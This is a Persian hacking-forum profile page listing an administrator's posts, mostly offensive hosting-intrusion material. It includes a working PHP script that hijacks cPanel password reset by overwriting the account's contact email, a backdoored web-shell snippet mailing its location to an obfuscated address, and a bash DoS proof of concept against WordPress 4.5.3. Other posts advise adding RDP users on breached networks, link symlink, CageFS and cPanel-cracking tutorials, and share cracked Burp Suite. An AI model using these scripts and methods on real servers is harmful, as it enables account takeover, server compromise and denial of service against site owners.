رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

MOHAMAD-NOFOZI

Administrator
  • تعداد ارسال ها

    273
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    2
  • Country

    ایران

تمامی مطالب نوشته شده توسط MOHAMAD-NOFOZI

  1. سلام خدمت شما بهترین حالت ممکن باید به یکی rdp های شبکه نفوذ کنید و add user کنید در حالت های بعدی به شما این اجازه رو میده که اکسپلویت های Local & Privilege تست کنید و اکسپلویت های موجود برای سیستم عامل ویندوزسرور 2003,2008,2012 وجود دارد و حتی امکان حملات sniffing هم روی شبکه وجود داره ... و خیلی از سناریو حملات رو میشود پیاده سازی کرد ./
  2. MOHAMAD-NOFOZI

    سوال/ Server Symlink

    سلام دوست عزیز مشخصات سرور قرار دهید نوع حملات سیملینک (بایپس) در وب سرور ها متنفاوت هست و عکس که شما قرار دادید زمانی مشکل پیش میاد که شما نتونید فایل php وب شلر خودتون اجرا کنید توی بحث سیملینک سرور های جدید اکثرا cloudlinux یا همان cagefs ابزار امنیتی نصب هست و نوع بایپس های این ابزار هم بستگی به ورژن اون داره ./
  3. سلام اسکریپت ریست پسورد سیپنل با استفاده از شل بصورت خودکار و دستی قابل انجام هست کد : <?php echo '<html> <head> <title>Script Resetpass CP </title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style> body { color:#80D713; background-color:#000000; } h2{ color:#80D713; } </style> </head> <body> <!--SCC --> <center> <div style="border-radius: 10px;border: 1px solid #45BD00;padding: 4px 2px;width: 25%;line-height: 24px;background: #000;color:#fff;"> <p><h2>Script Resetpass CP</h2></p> <p><h2>Reset password</h2></p> <p> <form action="#" method="post"> <input type="email" name="email" style="background-color: #181818;font: 9pt tahoma;color:#80D713;" /> <input type="submit" name="submit" value="Send" style="background-color: #181818;font: 9pt tahoma;color:#80D713;"/> </form> <br /><br /><br /> </p> </div> </center> </body> </html>'; $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $ips = getenv('REMOTE_ADDR'); if(isset($_POST['submit'])){ $email = $_POST['email']; $wr = 'email:'.$email; $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w'); fwrite($f, $wr); fclose($f); $f = fopen('/home/'.$user.'/.contactinfo', 'w'); fwrite($f, $wr); fclose($f); $parm = $site.':2082/resetpass?start=1'; echo '<br/><center>'.$parm.'</center>'; } ?> به صورت دستی : به این مسیربروید /home/ user /.cpanel/contactinfo و فایل contactinfo ویرایش کرده سپس ایمیل خود رو جایگزین ایمیل کرده قبلی کرد و ذخیره کنید و در اخر به این مسیربروید :2082/site.com/resetpass?start=1 و یوزر هاست رو وارد کنید و در اخر ایمیل خودتان را وارد کنید ./
  4. سلام خدمت دوستان عزیز این شل داری بکدور هست موقع اجرا روی سرور ادرس شل اپلود شده برای این شخص ایمیل میشود کد: <?php $for = base64_decode("c2VyY2FueTkyQGdtYWlsLmNvbQ="); $data ="http://" . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'] . "?cmd=ls -al"; mail($for,"priv8 forbidden all bypass", $data); عکس : تاپیک انتقال یافت ./
  5. با سلام خدمت دوستان عزیز آخرین ورژن ابزار Burp Suite برای عزیزان پیوست کردم دوستان که سوال یا مشکلاتی برخورد کردن در این تایپک سوالات پاسخ داده خواهد شد ./ : Burp Suite contains the following key components An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application An application-aware Spider, for crawling content and functionality An advanced web application Scanner, for automating the detection of numerous types of vulnerability An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities A Repeater tool, for manipulating and resending individual requests A Sequencer tool, for testing the randomness of session tokens The ability to save your work and resume working later - Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp. burpsuite_pro_v1.7.30_JK.zip
  6. بسم الله الرحمن الرحیم سلام خدمت دوستان عزیز بامشورت صورت گرفته تصمیم بر این شد طرح فراخوان مدیر برای بخش ها وقسمت های متفاوت انجمن صادر گردد در این راستا دوستانی که قصد همکاری در بخش های مختلف را دارند بعد از تایید صلاحیت میتوانند از مزایای گروه کاربری برخوردار شوند . دوستان که قصد همکاری دارند لطفا درخواست خود را از طریق پیام خصوصی با بنده یا تیم مدیریت به همراه نام و نام خانوادگی و سن ارائه نمایند. شرایط : پایبند بودن به قوانین انجمن داشتن اخلاق نیک فعالیت مستمر و دور بودن از حواشی تخصص در بخش مورد نظر داشتن حداقل 20 پست مفید داشتن روحیه همکاری تیمی دوری از حواشی از معیار های اصلی مورد نظر تیم مدیریت است . با تشکر ./
  7. MOHAMAD-NOFOZI

    Icg Htaccess Generator

    سلام خسته نباشید خدمت شما دوست عزیز لطفا لینک اسکن فایل exe رو در تاپیک قرار دهید تشکر
  8. ------------------------------------------------------------------------ Path traversal vulnerability in WordPress Core Ajax handlers ------------------------------------------------------------------------ Yorick Koster, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A path traversal vulnerability was found in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site. ------------------------------------------------------------------------ See also ------------------------------------------------------------------------ #37490 - Improve capability checks in wp_ajax_update_plugin() and wp_ajax_delete_plugin() ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the WordPress version 4.5.3. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ WordPress version 4.6 mitigates this vulnerability by moving the CSRF check to the top of the affected method(s). ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/path_traversal_vulnerability_in_wordpress_core_ajax_handlers.html Proof of concept The following Bash script can be used to trigger the denial of service condition. #!/bin/bash target="http://<target>" username="subscriber" password="password" cookiejar=$(mktemp) # login curl --cookie-jar "$cookiejar" \ --data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \ "$target/wp-login.php" \ >/dev/null 2>&1 # exhaust apache for i in `seq 1 1000` do curl --cookie "$cookiejar" \ --data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \ "$target/wp-admin/admin-ajax.php" \ >/dev/null 2>&1 & done rm "$cookiejar" ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way. سلام خدمت دوستان عزیز این آسیب پذیری امروز Public شده آسیب پذیری از هسته وردپرس هست این آسیب پذیری در ورژن 4.5.3 وردپرس وجود دارد در آخرین نسخه ی وردپرس این اسیب پذیری فیکس شده بهتره وردپرس خود رو آپدیت نمایید باتشکر
  9. سلام خدمت دوستان همان گونه اطلاع دارید که شرکت دی ان ان در بهار سال 1394 یک حفره امنیتی مربوط به فایل ویزارد نصب (InstallWizard.aspx) را انتشار نمود و سپس به فایله اصلاحیه برای فایل مذکور صادر نمود . به تازگی در نسخه های 7 و 8 این پلتفرم حفره امنیتی دیگر مربوط به این بخش گزارش شده که حمله کننده گان از حفره امنیتی قادر به حملات شدید و آسیب رساند به وب سایت ها میشود که در این خبر قصد داریم تا شما را با آموزش حل این حفره امنیتی و ایمن سازی ان همراهی کنیم این حفره امنیتی به مهاجمین اجازه می دهد : یک مدیر ارشد ایجاد کنند . تمام تنظیمات دی ان ان و جداول را ویرایش کنند . تنظیمات سامانه ارسال ایمیل (SMTP) را غیر فعال کنند . فایل های شل (Shell) با فرمت های مخلتف به سایت تزریق کنند . آموزش محافظت و ایمن سازی و رفع آسیب پذیری سایت ها از حملات مهاجمین (High Risk issue) 1.اقدامات ایمن سازی از طریق محیط مدیریت پلتفرم دی ان ان : بررسی میزبان > مدیران ارشد > لیست مدیران ارشد وب سایت را بررسی نمایید و در صورت مشاهده هر گونه کاربر اضافی سریع به حذف آن اقدام نمایید . بخش میزبان > تنظیمات میزبان > تب سایر تنظیمات > لیست فایل های مجاز > مطمئن شوید در این لیست فرمت های aspx , php قرار نداشته باشد در صورت مشاهده نیز حذف کنید . از بخش میزبان > تحلیل گر امنیتی (موجود در نسخه 7.4.1 به بالا) > موارد را از این بخش بررسی کنید . 2.اقدامات ایمن سازی از فایل منیجر پنل مدیریت (Root site) : بررسی و جستجوی فایل با پسوند های aspx , php در روت سایت و زیر پوشه سایت و در صورت مشاهده حذف فایل اقدام نمایید . حذف فایل های زیر از پوشه install : DotNetNuke.install.config DotNetNuke.install.config.resources InstallWizard.aspx InstallWizard.aspx.cs InstallWizard.aspx.designer.cs UpgradeWizard.aspx UpgradeWizard.aspx.cs UpgradeWizard.aspx.designer.cs Install.aspx Install.aspx.cs Install.aspx.designer.cs 3.تنظیمات سطح دسترسی کاربر به IIS : فقط دسترسی خواندن(Read) در ریشه و زیر پوشه ها . دسترسی خواندن، نوشتن و ویرایش در پوشه Portals و App_Data و Desktopmodules\admin\RadEditorProvider غیر فعال سازی امکان Script and Execute ./
  10. MOHAMAD-NOFOZI

    Getting Backdoor Of Cpanel

    سلام خدمت صنف هکران در اموزش با بکدور گرفتن در سیپنل اشنا میشید این روش تقریبا متود جدید هست امیدوارم لذت ببرید cp bc.part1.rar cp bc.part2.rar
  11. سلام خدمت دوستان پچ باگ Remote Code Execution Vulnerability در هسته جوملا Joomla! CMS versions 1.5.0 through 3.4.5 Reported Date: 2015-December-13 Rist : High مسیر اسیب پذیری : site/libraries/joomla/session/session.php Source For Patch : http://pastebin.com/raw/UHAGT887
  12. MOHAMAD-NOFOZI

    Root Access The Server With Symlink

    سلام خدمت صنف هکران در این اموزش با استفاده از سیملینک به روت سرور دسترسی پیدا میکنیم و به whm وصل میشم البته قدیمی هست ولی خالی از لطف نیست http://s7.picofile.com/file/8240650492/root.rar.html
  13. سلام در اموزش بایپس لوگین شل اشنا میشید این روش زمانی اتفاق می افته که شما پسورد هش شل دارد ولی پسورد هش کرک نمیشود توضیح نمیدوم فیلم واضحه هست bypass login shell by cookies.rar
  14. سلام اموزش باگ rce جوملا رکورد کردم این باگ توی هسته جوملا هست که پراویت هست این روزها شاهد این بودیم که خیلی از سایت های جوملا با استفاده از این اسیب پذیری مورد نفوذ قرار گرفتند دوستان سوالی داشتند درخواستی چیزی در این تاپیک اعلام کنید یاحق rce.rar
  15. بسم الله الرحمان الرحیم باعرض احترام خدمت دوستان , باتوجه به تغییرات ایجاد شده در سایت و مدیریت سایت ( جدا شدن root3r ) از سایت که دوستان هم خبردارند دامنه iran-cyber.org از تاریخ 1394/06/01 از طرف ما منسوخ شده و برای ما نمیباشد . و ابهاماتی بوجود آمد جهت اینکه این دامنه درزمانی که متعلق ما بوده مورد نفوذ قرار گرفته که کاملا اشتباه و ساختی میباشد . با V***P*n مشاهده کنید اثاری از دیفیس در آن نیست : http://zone-hc.com/archive/mirror/bc424fa_iran-cyber.org_mirror_.html بدرود
  16. MOHAMAD-NOFOZI

    تاپیک درخواست کرک هش

    بفرمایید 4f383ce7677e2a29005d430606899115:admin
  17. MOHAMAD-NOFOZI

    (How to Bypass CloudLinux (CageFS

    سلام اموزش دیگر بایپس کلود لینوکس ان شالله اموزش های بایپس بیشتری قرار خواهیم داد bypass.rar
  18. سلام در این اموزش با کرک cpanel به روش تقریبا جدید اشنا خواهید شد تموم ابزارهای بکار رفته در فایل قرار دارند http://s6.picofile.com/file/8220288400/crack_cp.rar.html ./
  19. How To Bypass Not Found Error سلام . در این بخش با آموزش با بایپس ارور Not Found در سیملینک آشنا خواهید شد . اگه سوالی بود در همین تاپیک مطرح شود . bypass(Not Found & 404).rar
  20. MOHAMAD-NOFOZI

    بیانیه بسته بودن سایت

    بسم الله الرحمان الرحیم با عرض سلام و تسلیت رحلت حضرت محمد (ص) و شهادت امام حسن (ع) و امام رضا (ع) به همه مسلمانان جهان . چند وقت سایت از دسترس شما عزیزان خارج شده بود که دلیلش هم برمیگرده به شکایت Cloud flare و تحریم شدن آدرس وبسایت توسط دیتاسنتر های اروپا و درنتیجه منجر به مسدود شدن سایت شد . ==================================== CloudFlare received an abuse report regarding: iran-cyber.net Please be aware CloudFlare is a network provider offering a reverse proxy, pass-through security service. We are not a hosting provider. CloudFlare does not control the content of our customers. The actual IP address hosting iran-cyber.net is ***.***.***. Using the following command, you can confirm the site in question is hosted at that IP address: curl -v -H "Host: iran-cyber.net" ***.***.***. / Below is the report we received: Education bypass cloudflare: http://www.iran-cyber.net/threads/%D8%AC%D8%A7%D9%85%D8%B9-%D8%AA%D8%B1%DB%8C%D9%86-%D8%A2%D9%85%D9%88%D8%B2%D8%B4-cloudflare-dns-protection-bypass.2136/ The acts of hacking into US website (s) http://zone-hc.com/archive/mirror/9595f89_ash-limudim.co.il_mirror_.html http://zone-hc.com/archive/mirror/1a90895_om-c.co.il_mirror_.html http://zone-h.com/archive/ip=108.175.158.12 .... and http://zone-hc.com/archive/mirror/ef473c7_btel.com._mirror_.html .... Please check out thanks very much Please address this issue with your customer. Regards, CloudFlare Abuse ==================================== این موضوع بهانه ای شد جهت خریدار سرور اختصاصی و فعال کردن پیوست (ضمیمه) فایلها, بر روی سایت که برای تمامی کاربران بصورت نامحدود فعال است و میتوانید فایل های خود را در انجمن اپلود کنید . از کاربران تقاضا داریم درصورت مشاهده هرگونه مشکل در سایت به تیم مدیریت جهت رفع آن گذارش دهند . باتشکر مدیریت گروه امنیت سایبری ایران
  21. MOHAMAD-NOFOZI

    How to Bypass Forbidden in symlink

    در این قسمت با بایپس دیگر اشنا خواهید شد http://s3.picofile.com/file/8220284984/bypass_Frobidden_.rar.html ./
  22. MOHAMAD-NOFOZI

    How to Bypass Forbidden in symlink

    سلامی دیگر سعی میکنم تموم فیلم با متود های جدید بایپس برای دوستان رکورد کنم در این بایپس با ارور های Forbidden و Internal Server Error اشنا خواهید شد http://s6.picofile.com/file/8216274600/bypass_Forbidden.zip.html ./
  23. MOHAMAD-NOFOZI

    How to Bypass Forbidden in symlink

    سلام در اموزس با بایپس Forbidden در سیملینک اشنا میشوید این بایپس آشنا میشوید خیلی از دوستان در این موضوع مشکل دارند سعی میکنم تموم اموزش های بایپس Forbidden برای دوستان قرار بدهم باتشکر ./
  24. MOHAMAD-NOFOZI

    (How to Bypass CloudLinux (CageFS

    سلام در اموزش با بایپس کلود لینوکس یا همان CageFS آشنا میشد کار CageFS یکی از ابزارهای CloudLinux است که با نصب آن میتوان یوزر ها را در سرور از یکدیگر ایزوله نمود بایپسش پاپلیک نیست خیلی ها اموزش شو برای فروش گذاشتند http://s6.picofile.com/file/8214798350/Bypass_Cloud_Linux.rar.html

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...